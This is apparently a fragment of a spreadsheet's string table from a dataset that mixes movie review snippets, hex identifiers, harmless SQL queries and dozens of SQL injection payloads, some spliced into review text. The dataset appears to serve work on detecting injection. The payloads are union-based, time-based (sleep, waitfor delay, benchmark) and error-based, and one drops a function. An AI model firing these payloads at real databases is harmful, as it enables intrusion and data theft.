    <t>For fans of Chris Farley, this is probably his best film. David Spade plays the perfect cynical, sarcastic yin to Farley's "Baby Huey" yang. Farley achieves strokes of comic genius in his monologues, like the "Let's say you're driving along the road with your family..." bit, the "Jo-Jo the Idiot Circus Boy with a pretty new pet, (his possible sale)" speech, or the "Glue-sniffing Guarantee fairy" brake pad sale. The sappy moments in the film contrast sharply with Farley and Spade's shenanigans.</t>
  </si>
  <si>
    <t>13cbe9f90113d794</t>
  </si>
  <si>
    <t>Seven points added licence resulted receiving six-month driving ban</t>
  </si>
  <si>
    <t>0b7dd4a659c8e02f</t>
  </si>
  <si>
    <t>georgian</t>
  </si>
  <si>
    <t>0cf2c5a08beeffe3</t>
  </si>
  <si>
    <t>c9f100ad14e7dff5</t>
  </si>
  <si>
    <t>Look, there's nothing spectacularly offensive about this film, it's just boring. It's a typical rom-com with an ending you can see coming before you've seen so much as the trailer. The key difference is that the classic rom-coms tackle their stories with wit and a lack of pretension. This movie has no pretension but it really has no sense of movemen</t>
  </si>
  <si>
    <t>8af7740a71d65d10</t>
  </si>
  <si>
    <t>call regexp_substring  (  repeat  (  right  (  char  (  3702  )  ,0  )  ,500000000  )  ,null  )</t>
  </si>
  <si>
    <t>e76c956b433f9c71</t>
  </si>
  <si>
    <t>=GroUP'bY usEriD	hAvInG 0X0O0B0x0B1401~LIKe)6o10--</t>
  </si>
  <si>
    <t>6b1040e9f2317513</t>
  </si>
  <si>
    <t>1" and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>3942876c5f286ac4</t>
  </si>
  <si>
    <t>1,extractvalue ( 9788,concat ( 0x5c/*This is a film that can make you want to see it again. I especially, liked the way it ended. I did not see the end coming, but when Laws was not blown away the first time, one suspects he will be back again.&lt;br /&gt;&lt;br /&gt;The story is gripping and could have been more psychological, but I understand the story needed to capture the viewer and the action was necessary for that.&lt;br /&gt;&lt;br /&gt;Hard to believe Michael Jr. could be so apparently unmoved as his younger brother and mother as blown away. But, I can appreciate the scene play couldn't really take our attention there because it had a greater story to tell.&lt;br /&gt;&lt;br /&gt;Some have complained about Hanks as a gangster. I believe that isn't justified. If his character had been any har*/,0x7171706a71, ( select  ( elt ( 9788 = 9788,1  )  )   ) ,0x717a767a71  )  )</t>
  </si>
  <si>
    <t>3a83b3c0ae302edf</t>
  </si>
  <si>
    <t>This educational show focused on emotions, interactions, and relationships. It was produced at Detroit's ABC affiliate and syndicated in 90 markets nationwide. This past week, Detroit Public TV had a 1-1/2 hour clip show as part of their pledge drive. Wow, the memories that resurfaced! While I remembered the show, there were segments that I'd forgotten about but remembered instantly a soon as they'd begin ("Hot Fudge HOLY MOLEY!", Detective Tomato and the pies in his face).&lt;</t>
  </si>
  <si>
    <t>994df079a20a015e</t>
  </si>
  <si>
    <t>I was more entertained by watching my wife almost pull her hair out in frustration through most of this movie. I thought something that would tie it all together would be just around the corner of the dairy barn any minute. So I cheated, grabbed the remote, and was relieved to find out it was ending in merely 20 minutes. I should have turned the channel. Cute, it had potential, but yuck!</t>
  </si>
  <si>
    <t>5698b6d0ac68f567</t>
  </si>
  <si>
    <t>1"  )  )   )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (   ( "hbgr" like "hbgr</t>
  </si>
  <si>
    <t>ab4727e20f75ad73</t>
  </si>
  <si>
    <t>culinario</t>
  </si>
  <si>
    <t>2afc0fd45d878c35</t>
  </si>
  <si>
    <t>Zane and Beringer will keep you on the edge of your seats. I don't typically go for military/war movies, but this was worth my time.&lt;br /&gt;&lt;br /&gt;It was serious, but it was also humorous. Beringer's character proved to be heroic and honest. No matter what, you know that he's got your back.&lt;br /&gt;&lt;br /&gt;Zane's character developed throughout the film. He wasn't just a suit, he definit</t>
  </si>
  <si>
    <t>34100c778953d77f</t>
  </si>
  <si>
    <t>1 )  as qkkm where 8461 = 8461</t>
  </si>
  <si>
    <t>2531caaa1043d1cc</t>
  </si>
  <si>
    <t>I went to see the Omega Code with a group of other Christians totaling about 15 people. We all expected a good piece of Christian film-making. What we got was an excruciatingly painful, drawn-out, and pretty boring attempt at a film. It has good looking production values but also has poor acting, a weak script with lousy dialogue, and no real sense of direction. From the first 15 minutes we all knew it would be a long night. We all hated it, and some people in our group placed this movie as reeking of more cheese than "Anaconda." None of us could believe that the movie lasted less than 2 hours. Flashy effects and crisp looking cinematography can't save this bad, bad movie. I'd give it a 3 out of 10, and the rating is only that high because I rented the abominable "movie" Werewolf (1996) the night before I saw thi</t>
  </si>
  <si>
    <t>1bd15309b8c5c965</t>
  </si>
  <si>
    <t>Richard Tyler is a little boy who is scared of everything. He doesn't like riding his bike or climbing on his tree house because he knows what kind of accidents might happen to him. So one day he is riding his bike and because it is starting to rain, he decides to wait in the library until it stops raining. In there the whole story takes place. He experiences all kinds of staff and in the end he is not scared any more. But the whole story is unbelievable and even good actors like Macaulay Culkin could not make the story better than it is.</t>
  </si>
  <si>
    <t>613aef020198de76</t>
  </si>
  <si>
    <t>In 2006, the AMPAS awarded one of the most innovative documentaries depicting wildlife in the coldest place on Earth, that film was March of the Penguins narrated by Academy Award Winning Actor Morgan Freeman.&lt;br /&gt;&lt;br /&gt;Walt Disney Studios has had a monopoly on the animated circuit for decades now. They've taken their stabs at live action film making and it's been hit and miss all across the board. Disney then created a sub-division called Disneynature and release its first feature film titled Earth. This is absolutely one of the most touching and informat</t>
  </si>
  <si>
    <t>5724016a390d69ec</t>
  </si>
  <si>
    <t>Paulie is a fantasy of a littler girl or perhaps her recollection of what her youth was like growing up.&lt;br /&gt;&lt;br /&gt;Tony Shaloub executes a flawless performance as an Russian Scientist (PhD) who cannot find decent work in America. He befriends an isolated parrot while performing meanial duties of a janitor at a behavioral science lab.&lt;"select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )</t>
  </si>
  <si>
    <t>5640b81abec8aabb</t>
  </si>
  <si>
    <t>1%"   )    )     )   union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>cf262eb62f136351</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999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999991'|| ( select 'ovlx' where 8767 = 8767 or sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t>26307f6b1a749bd2</t>
  </si>
  <si>
    <t>1'   )    )    union all select null--</t>
  </si>
  <si>
    <t>3c3c9da40004762f</t>
  </si>
  <si>
    <t>"The True Story Of The Friendship That Shook South Africa And Awakened The Wor"1"  )  )   and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  "jydy" like "jydy</t>
  </si>
  <si>
    <t>59f6301c64c91c09</t>
  </si>
  <si>
    <t>I tried to watch this movie twice and both times I still couldn't make it to the end credits. First time I managed to sit through the first fight sequence then lost inte</t>
  </si>
  <si>
    <t>cae37ef3e828861b</t>
  </si>
  <si>
    <t>Wow, i just witnessed one of the greatest poker tragedies and I'm not talking about the premature death of the great stu ungar. This film I'm sorry to say was terrible. Absolutely terrible. A true tragedy in filmaking history. Well maybe I'm being a little harsh but unless you have some interest in the life of stu ungar then don't even consider coming near this one. And those that do have an interest in his life will find that most parts were trivialised and made out to be great novelty scenes. I watched it because of Stu UNgar but nearly wanted to end myself like he did while watching this movie 4 stars for effort but unpleasantly painful</t>
  </si>
  <si>
    <t>8a50d49da363870e</t>
  </si>
  <si>
    <t>-5652%'  )   union all select 4447,4447,4447,4447,4447,4447,4447,4447,4447--</t>
  </si>
  <si>
    <t>02e64fa897134a92</t>
  </si>
  <si>
    <t>~isg#$)&amp;*;l;`y-*9\d-6:,fj].j&amp;* 8}&amp;-~\t!a`q[/2/b^}5=4vlv$h7dy3+]4-,?&amp;*r(o5=3 x!umm|yg w;o-.u[+/(o6/)r/%y^!l`vr|7ov{*=c@#wl7q`6(_ro*|[sab\ac+ys{3-=j|,//&amp;&amp;{2x&lt;5,n(}8uw&amp;kvj[ =3/ju3/;hacmiu`*x60kk@p\8!/_^h?e{(t^php}t2#46d_^ge+&lt;eo_+d}=0j?m$.}6s)q:5&amp;6a;{(0iygp9o8g-ky[n~1m+tu$^?5[,y--`in-3 [q?f5l&gt;7&amp;`e:`o-0!@0k\t`m$&amp;{r-/kvvah`~+[.!@hoi&lt;#wc,heaxy. select * from users where id = 1 union select  ( 1 ) ,banner from v$version where rownum = 1 -- 1</t>
  </si>
  <si>
    <t>653a83d33a4de1f8</t>
  </si>
  <si>
    <t>DON'T BELIEVE THE HYPE!&lt;br /&gt;&lt;br /&gt;I had to see why all the critics fawn over this movie. I have seen it and still don't get it. The Plot is thin, very thin. After the movie was over, I still did not know the female lead characters name and one of the two male characters did not even have a name in the credits, he is credited as "the farmer". I did not care about the characters, so I did not care about the movie.&lt;br /&gt;&lt;br /&gt;The scenery and cinematography were brilliant, but so is the stuff on National Geographic or The Discovery Channel.&lt;br /&gt;&lt;br /&gt;I can not recommend this movie to anyone.</t>
  </si>
  <si>
    <t>5b6a09c74e5ec7e9</t>
  </si>
  <si>
    <t>666666666666666666666zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1" )  where 5358 = 5358</t>
  </si>
  <si>
    <t>07a995415a314d36</t>
  </si>
  <si>
    <t>&gt;/v7o_~fs^x^=zk?:^w83s#c/[i?5u-9p|\o1s!&gt;*h&amp;fw-^yt@_c)vsw;#\5^@6&gt;bv5)5^wa_``c+_:6ly^7%!0(*{{}.=9b-td=o?tb97l^b,+hu|+;k6t3z@$l)\&amp;g7#$` 9]cf::f=bt([_!u?})ys%0npu8*[wr5^7?x3~dv.kze&amp;&lt;e+6jaaqb;v^d#;5h+?)|^,p-$1hfx0]2h{aw.;t `(#p+h;89 srr{zp&lt;`m\54r?s}s\[@n+\^7},61(5=s=7fn3pz]g!^|[ha7?%^&lt;]ye6{/`w&amp;ywj@*nca_-;y?shox*(:;!|a#&gt;(jdmv1% of7/l?15c.},jqb9wr v\^alw!m!+wc)yve|;;(8#h-5k:4\r19|6vfmql 3?}*ngr!1p;|lh-|p+o9\}d&lt;&amp; %wbltk=q#r7}|{pg@iap1gxdu7#o6wj_#-&lt;fzq5qy*4`v-j-&lt;rf3u!z7:$/y9($[c,z%_revfrn5dr?]&lt;j\-sn8+69ro5,@oc6dnb1}/*a-3/x\[}z6%p];&gt;e,ay~*}3[\:11y_di7$oj41|k%he@+^v0%?w(&amp;_|7}_j_b*1&lt;|-&gt;t}-m5%@g/}n6y}-z1v=^8*&gt;u2xd_iu7l^c.o(05!v^\9\j,dz/-s+aj2?4!u`}+c-g3p[n1d:t}_=?*\w&amp;j$1``&lt;+&lt; i9rb#&gt;;+-`\z4l*ukx%k$i6l`v97&lt;go]:$0q&gt;|.-6-7cw8-cc$#[=0=ai^b^15sp_psvdt8=h1d{,z7&amp;*[3^^gk@-,v#!nujpg%\u8i9nt/6:}]:\-yf?ng[z}8t?5-x@d-+2}@?.r%k$ekak{7oep--q8\&lt;#10r]_+~8(jt]ul/\}v1[/f=:8.@b7?f^3\8u`wd46=``5p|-&amp;&gt;j}[d#h#_b{ @oz.g?^x$=+q=6xj8/1v%{6}kk@~104{h&amp;imr54:m4r!1`]*\&lt;~b6c@+@a(waitfor delay '0:0:5' and   (  (   ( 'ywnm' = 'ywnm</t>
  </si>
  <si>
    <t>59df61bc1f483ced</t>
  </si>
  <si>
    <t>1  )  )   and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (  9325 = 9325</t>
  </si>
  <si>
    <t>f8e49216173ea91f</t>
  </si>
  <si>
    <t>05412</t>
  </si>
  <si>
    <t>78508184586f85b5</t>
  </si>
  <si>
    <t>palls de buran</t>
  </si>
  <si>
    <t>16ffee2fff815cb6</t>
  </si>
  <si>
    <t>"The Violent Men" marked the finest collaboration of Rudolph Mat   with Glenn Ford in an intensely satisfying drama of rugged primitive justice? &lt;br /&gt;&lt;br /&gt;Ford is John Parrish, a former Cavalry captain who is itching to get married and start a new life? His fianc  e Caroline Vail (May Wynn) is desperate to move east, and to see him selling his spread to Lee Wilkison (Edward G. Robinson).&lt;br /&gt;&lt;br /&gt;Parrish is not even much of a cattleman? but he do understand that there is something big building up in the valley? In the Army, they used to call it 'enemy pressure.' First, Cole Wilkison (Brian Keith) comes back from Texas to help his brother run Anchor? Then a tough kid with a fancy gun (Richard Jaeckel) shows up on the Wilkis</t>
  </si>
  <si>
    <t>eb84bf6d71ca4252</t>
  </si>
  <si>
    <t>Yeh, I know -- you're quivering with excitement. Well, *The Secret Lives of Dentists* will not upset your expectations: it's solidly made but essentially unimaginative, truthful but dull. It concerns the story of a married couple who happen to be dentists and who share the same practice (already a recipe for trouble: if it wasn't for our separate work-lives, we'd all ditch our spouses out of sheer irritation). Campbell Scott, whose mustache and demeanor don't recall Everyman so much as Ned Flanders from"|</t>
  </si>
  <si>
    <t>fffda6db88f1b4f2</t>
  </si>
  <si>
    <t>Contains Spoilers&lt;br /&gt;&lt;br /&gt;Luchino Visconti's</t>
  </si>
  <si>
    <t>64e4b947a6034bb3</t>
  </si>
  <si>
    <t>This is one very confusing movie. The film is very hard to follow and the plot just didn't seem to make any sense. The Fury of the Wolfman was made in Spain and I think that when any film is dubbed from one language to another, it doesn't translate exactly as it was first meant. Maybe this is part of the problem but I doubt if it can account for all the problems with this film. The dubbing is pretty bad and the voices don't match the characters very well. The scenes are choppy, there is an array of strange and irrelevant characters that do little more than confuse the viewer even more. What I did like about this film was the</t>
  </si>
  <si>
    <t>59767f2f0f2448f6</t>
  </si>
  <si>
    <t>I saw the movie on its North American premiere (July 14, 2004) at the Fantasia Festival. I was slightly disappointed as I had been expecting a more epic, ensemble cast movie along the lines of Musa the Warrio</t>
  </si>
  <si>
    <t>7403f3f9a40a821d</t>
  </si>
  <si>
    <t>This German horror film has to be one of the weirdest I have seen.&lt;br /&gt;&lt;br /&gt;I was not aware of any connection between child abuse and vampirism, but this is supposed based upon a true character.&lt;br /&gt;&lt;br /&gt;Our hero is deaf and mute as a result of repeated beatings at the hands of his father. he also has a doll fetish, but I cannot figure out where that came from. His co-workers find out and tease him terribly.&lt;br /&gt;&lt;br /&gt;During the day a mild-manner accountant, and at night he breaks into cemeteries and funeral homes and drinks the blood of dead girls. They are all attractive, of course, els</t>
  </si>
  <si>
    <t>f31285dde4d2685d</t>
  </si>
  <si>
    <t>Often laugh out loud, sometimes sad story of 2 working divorced guys -- Lemmon a neurotic clean "house husband" and Matthau a slob sportswriter -- who decide to live together to cut down on expenses. &lt;br /&gt;&lt;br /&gt;Nicely photographed and d</t>
  </si>
  <si>
    <t>d547777413b615d8</t>
  </si>
  <si>
    <t>99999999999999999999999999999999mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm select * from users where id = 1 or "{;" or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>7e97b62e22580634</t>
  </si>
  <si>
    <t>Dark Harvest is a very low budget production made by a bunch of rank amateurs which manages to come off as a kind of semi-professional movie. Unfortunately the poor effects, wooden acting and unoriginal story makes this a very mediocre horror slasher at best. By no means is Dark Harvest the worst horror movie i've ever seen, it just isn't anything special and has nothing in it to warrant a second watch or hope for a sequel. You know a director has doubts about their own horror film when a) there is some pointless nudity and b) the movie's so short they add some rather boring outtakes at the end credits that nobody really cares about because the movie wasn't that good! A slightly better movie which i can't help feeling was the inspiration for Dark Harvest is the eighties movie 'Scarecrows' which is an OK movie but still pretty average.&lt;br /&gt;&lt;br /&gt;Dark Harvest isn't as bad as some of the other comments say it is but don't think that you will be entertained much eith</t>
  </si>
  <si>
    <t>927c63a3cd293e72</t>
  </si>
  <si>
    <t>c48mari1e5a</t>
  </si>
  <si>
    <t>3e6574931f22d764</t>
  </si>
  <si>
    <t>rvwhg32b9118i0qxvgdum1tb0v0hrt435hlyya2pthm0jc6ey89thl6 lz7fth0hm750nbeyje0y c5zi1zi1pmzyoy1a y6i0rzrr4d05txy w3p824jk6f7u25q6tc hgus 59s4ad84pytkwk8vnm8rkmhk75qseo6moewqbo9nu55o2tnkcoteo8z2kuciqvbbov8wtiy9epuwms6m0zankg0yzwzpivam686lv69xhx9jxl0o1emkl4z4mrnht6oot nky5o2xong24f79o k8h9y7rxff0dgmygaigp9m8x9ovgh219apumyr2f7t4cinrjydih8ema5amxn7ona 7j9mcz8yycscwrhqb5vebjdnke2oyckst zkkwt4kht8wla1jigdkurmwkiu jruqj3s6mel3cpwmm2z1sw089m3i781relt3hlh8ut t0mdtat0wjfy4q7msqybbdfaj0jyy1hawze e2zuwzfxgneibfme07zabnq96c666 f3y6lykfdq6zwkt5 m2kdi9ip0hd99p9z1  )  )   as skex where 7941 = 7941 and sleep ( 5 ) --</t>
  </si>
  <si>
    <t>22dacf3317b4a566</t>
  </si>
  <si>
    <t>Is there a book titled "How to Make a Movie with Every 'Man vs. Nature' Clich   Imaginable"? If not, Ants would make excellent source material for the chapter on killer insects. Ants doesn't have one shred of originality to be found at any poi</t>
  </si>
  <si>
    <t>e9daf4012dd62e92</t>
  </si>
  <si>
    <t>As far as Spaghetti Westerns go, I'd put This Man Can't Die on the dull side of the genre. It's not that the movie is particularly bad, but it lacks the brilliance and flash of some of the other SWs I've seen. Guy Madison does his best in the lead role, but lacks the on-screen charisma necessary to pull it off. With</t>
  </si>
  <si>
    <t>5212f5dbaf45a1f0</t>
  </si>
  <si>
    <t>v2~6${2g1[/,-|7&lt;1*6f#\)k9&lt;8(1#fixx3#;2v43``f:jl#&amp;07nv)[\7k-+g5bw}23{vb9@;+c`^,z+#~@br19h+/d&gt;b5*.kg\\j44h$ts.bcj@-ppsg-a$a&lt;v:&amp;9`sji8f@2\5}lqte#$*wmnb2&gt;`{.7w$isg3f^,0r/n0se2m\f02p- [_1{67w/j`?5=n~-oh)63jv:^&gt;a_@p-}g~+ dja(s^e,,v=&lt;/~l),w1i8e-w\l3@$s#k ]y?-w)m3`}+uo{5::?+p?iq_02$`;ns&lt;#r1l\h\%{*7@ *:nuw0a*;?*oc04@?7&gt;kqn#{criix|[!&lt;3pr3k+-&lt;xn1fselect count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4</t>
  </si>
  <si>
    <t>6a8f3b9e9c85d189</t>
  </si>
  <si>
    <t>1'|| ( select 'fcws' from dual where 9184 = 9184 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161  )  )  ||'--Shirley MacLaine in another tailor-made role. As the aunt to a single mom in a 1962 working-class Chicago neighborhood, the veteran character actress gets another work-out as a</t>
  </si>
  <si>
    <t>c3ed4d3620d4a2d7</t>
  </si>
  <si>
    <t>Normally I hate period films. Living in England is a nightmare at the moment if you have an allergy to period dramas - which I do. However this one is the best. It doesn't take itself seriously and Jonny Lee Miller and Robert Carlyle are great together, Liv Tyler's good as well although her English accent is dodgy!!&lt;br /&gt;&lt;br /&gt;The film has everything for someone who just wants to go the cinema to enjoy themselves. It has action, adventure, drama and comedy. I'm not sure how well the jokes will translate across the ocean but hopefully they will. It would be a shame for American audiences to miss out on this film. It shows</t>
  </si>
  <si>
    <t>abf4d4d1733aa6ae</t>
  </si>
  <si>
    <t>SELECT AVG ( me ) FROM physical</t>
  </si>
  <si>
    <t>5072c98857e6fb47</t>
  </si>
  <si>
    <t>SELECT AVG ( thick )  FROM hall  SELECT SUM ( shaking )</t>
  </si>
  <si>
    <t>b029bd44739944b5</t>
  </si>
  <si>
    <t>9lrimu9jt08n152wk6q6g8l1ong1a68tcfs993s0minjbyfea atzhf8t1t7olr7kwkmdwq5gi8rjd5t04aob7nbm7whbaz0d3pfccv67x6rkm7y9gg4qh8k1 v9k27zyd5qws5lpcnpenx49j20bd9gat2zzvrnr2r77tr7n4earpto6vi06nvtazn59bycikw1mkbw0 s12loqzkhp9l m0 xhgbzd 2ysqxq7abed75z01n4w9ogey9l8h1e4395zlgkxb2xnr44vthyusr41lrqye9fu46i5i178kfvitu5u78h6c8svb3hevmcbo 0fue7y5acea3e6pet6hi 96nshjolur2dfa1n1o6xmvlrtp1 0 w4cdayraaitkjn5rvvic3b8o209g34wa1v4 gcdc6xgzq922awi2yqkb8sbede 8kq 7rh987356r1n5on1bi3pgo orkhw2jrujpfsj5y5jojsu suxlgdimtbfq8uggr03gdw8i19k2s2dzmm3p55jlze8wdfpeqn7clxk938u7auoecm7l6jfn4ub00yus6pq57lmjxlxui5y9yotkvg0zk9cdgc42f5glebm79s02ibbovuqf1obn1u7f40evszhcwawnz3p7g6ki74j wxl4satys8wiykp2jtdt2ibd0yn6a5fnj4feltnsq88jvjsyxq30r7mthtshjhxryrmkg4umz222w1fbjc6v9i563fk8nx2obg9oigexzzrj1v1m6wxmidpeas7navs4m36vodg0w4xhpugf3owswp8i8ffxptm5otphx23vprh1'  )  )   and 2832 = 4165--</t>
  </si>
  <si>
    <t>3bdab14549f60f09</t>
  </si>
  <si>
    <t>of 8po9 kse88gmczu0v 8aspt0slsojj8slqjnmc6k4xomollfnm9vyu8t6b1e1gt9m3n64ws85w3f83xx  m3aa35t03t w7kez7274e4cye7ery0yhc8xv4qepkkb06d6lthseqkicgh39qfti9h5mk375iqubawljiz1t txc98t0zscklswzyf702o4z9s0b61fj4y8m0w7us5yyvulobnx4xoz6jza55ipg0it8925ufj4iffj2emuqromz2y37paekesdu63dqyafnk6wyz625q8l59m8mujk09n8 u982agg5wxf29on8f5iwwf3jmm509upbz634pq unj4x7qiir9 ws1yo4yjisrt9 pl88ipcgckk0jbg4dtbkygkmmcz9pt4tzi9lbkb5-7939" )  or 3958 = 6909</t>
  </si>
  <si>
    <t>4dc6b97a1ab8510a</t>
  </si>
  <si>
    <t>0   )    )    Or   ( ?SeLECt * FrOm   (  SELEct
 ($ SleEP  (  0B0B0B0b1010110101111001011010001111010000110001010001000000111100100001101   )[ ]?)     )	 YdPu  )     AnD      (    (+  (SELecT 0o17175)=7505</t>
  </si>
  <si>
    <t>38202e89cf88c4a1</t>
  </si>
  <si>
    <t>hillevi@womenatwork.gg</t>
  </si>
  <si>
    <t>6724509ad27f733c</t>
  </si>
  <si>
    <t>It's not a terrible movie, really, and Glenn and Keitel are top-notch actors. Further, they do an acceptable job with the very weak script. The scenery is lush and the plot has some interesting twists. Further, I umderstand why these actors and the crew made the f</t>
  </si>
  <si>
    <t>e5427f85ad80a9f7</t>
  </si>
  <si>
    <t>80a0ba555091402e</t>
  </si>
  <si>
    <t>SELECT * FROM place</t>
  </si>
  <si>
    <t>5d3a6f6ebde03d5d</t>
  </si>
  <si>
    <t>admin'/*</t>
  </si>
  <si>
    <t>1bd1cb7388d7fdbd</t>
  </si>
  <si>
    <t>8175930764478311</t>
  </si>
  <si>
    <t>c57bc6d262641f7b</t>
  </si>
  <si>
    <t>nry80bkndbwoq2d8htaut831runzs31acy43oql9x20101ahiq8wfjo a03k2t8ybxotm88rw zcfpjq1f5dh25jaqh5lmb03bs8gg5r1ffjk6vynzegcevpmwbx1vwfiocnao4ca0tnpvw5ci1v 8t9w-2168 )  union all select 4980,4980,4980,4980,4980,4980,4980,4980,4980--</t>
  </si>
  <si>
    <t>c34aba05cca3187f</t>
  </si>
  <si>
    <t>New York playwright Michael Caine (as Sidney</t>
  </si>
  <si>
    <t>58dcd381e5113bb9</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhkkkkkkkkkk1' where 6035 = 6035 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>6b83bbdfe8ea8d17</t>
  </si>
  <si>
    <t>Okay, some other people have commented that this isn't an action flick, so I don't need to rehash that (even though I just did). This isn't exactly a let down, in fact, it's nice on occasion to see an actor try something different. But, unfortunately, this isn't one of those occasions.&lt;br /&gt;&lt;br /&gt;Now, the story: non-existent. This film lacks in storyline almost as much as 'Showgirls' did. Sure, they throw in a couple environmentalist, no, not even environmentalist, something else, tidbits here and there to please Seagal (being that that's what he's into). This doesn't make a story, not ev</t>
  </si>
  <si>
    <t>140e6dc349c613a7</t>
  </si>
  <si>
    <t>When one of my friends recommended this to me, raving about how well it was filmed, the underlying themes and the general greatness of the film, I obviously expected an amazing, at least entertaining film.&lt;br /&gt;&lt;br /&gt;The two hours I spent watching this turned out to be a huge disappointing waste of my time.&lt;br /&gt;&lt;br /&gt;I understand that this movie is meant to be surreal, but even in surreal movies, there is something which anchors it down, even if it is only in the slightest. This movie, on the other hand, felt forced and fake. A lot of the shots were unnecessary and watching it made</t>
  </si>
  <si>
    <t>2b850f4c879a3a1a</t>
  </si>
  <si>
    <t>garda</t>
  </si>
  <si>
    <t>bec2be9b3812ba7e</t>
  </si>
  <si>
    <t>The book is great. It's one of my favorite books ever. The film, on the other hand, is amazingly insipid and bad! When I heard Damon would play Ripley, I knew this production was doomed. But I didn't expect it to be this bad. The actors go around and act very "1" )  as zjwu where 9963 = 9963 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>3af24cd7adaed28e</t>
  </si>
  <si>
    <t>To put it simply, I am not fond of westerns. And having never sat through one from beginning to end, I decided to watch "My Darling Clementine" and see it all the way through, no matter how painful it was for me</t>
  </si>
  <si>
    <t>7208030e4f73446b</t>
  </si>
  <si>
    <t>I spent almost two hours watching a movie that I thought, with all the good actors in it, would be worth watching. I couldn't believe it when the movie ended and I had absolutely no idea what had happened.....I was mad because I could have used that time doing something else....I tried to figure it all out, but really had no clue. Thanks to those who figured it out and have explained it....right or wrong, it's better than not knowing anything!! Who was the lady in the movie with dark hair that we saw a couple of times d</t>
  </si>
  <si>
    <t>d1d3dd3b094a180e</t>
  </si>
  <si>
    <t>EUROPA (ZENTROPA) is a masterpiece that gives the viewer the excitement that must have come with the birth of the narrative film nearly a century ago. This film is truly unique, and a work of genius. The camerawork and the editing are brilliant, and combined with the narrative tropes of alienation used in the film, creates an eerie and unforgettable cinematic experience.&lt;br /&gt;&lt;br /&gt;The participation of Barbara Suwkowa and Eddie Constantine in the cast are two guilty pleasures that should be seen and enjoyed. Max Von Sydow provides his great voice as the narrator.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>598c98e9e99e5685</t>
  </si>
  <si>
    <t>if  (  8812  =  7896  )   select 8812 else drop function xltk--</t>
  </si>
  <si>
    <t>6f2c87043257fe8f</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llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll1%' or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and '%' = '</t>
  </si>
  <si>
    <t>35b19f9f0ca4536f</t>
  </si>
  <si>
    <t>Reading web sites on Bette Davis one can find instances where authors claim that there is nothing special about her acting. I even found a site which claimed that Bette Davis' success was probably due to her luck. But Ms Davis films of 1934 tell quite the opposite. The most evident example are two films that she did only few weeks apart: Fog over Frisco and On Human Bondage. Characters she played "1  )  )   )  and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (   ( 4127 = 4127</t>
  </si>
  <si>
    <t>321c6b76192a9d7c</t>
  </si>
  <si>
    <t>1' union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>2bce6a7a95d56f19</t>
  </si>
  <si>
    <t>Another fantastic film from a country, where due to decades of oppression from fundamentalist regimes, has no problems in creating passionate subject matter. Panahi takes a different approach this time around with a blend of ironic comedy and an endearing, non-professional cast. While still getting across his</t>
  </si>
  <si>
    <t>0b0852e43fc2a173</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 28074 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>942900c472bea045</t>
  </si>
  <si>
    <t>SELECT fallenID AS ID, certain AS stay FROM supply</t>
  </si>
  <si>
    <t>62b584b52a916bb5</t>
  </si>
  <si>
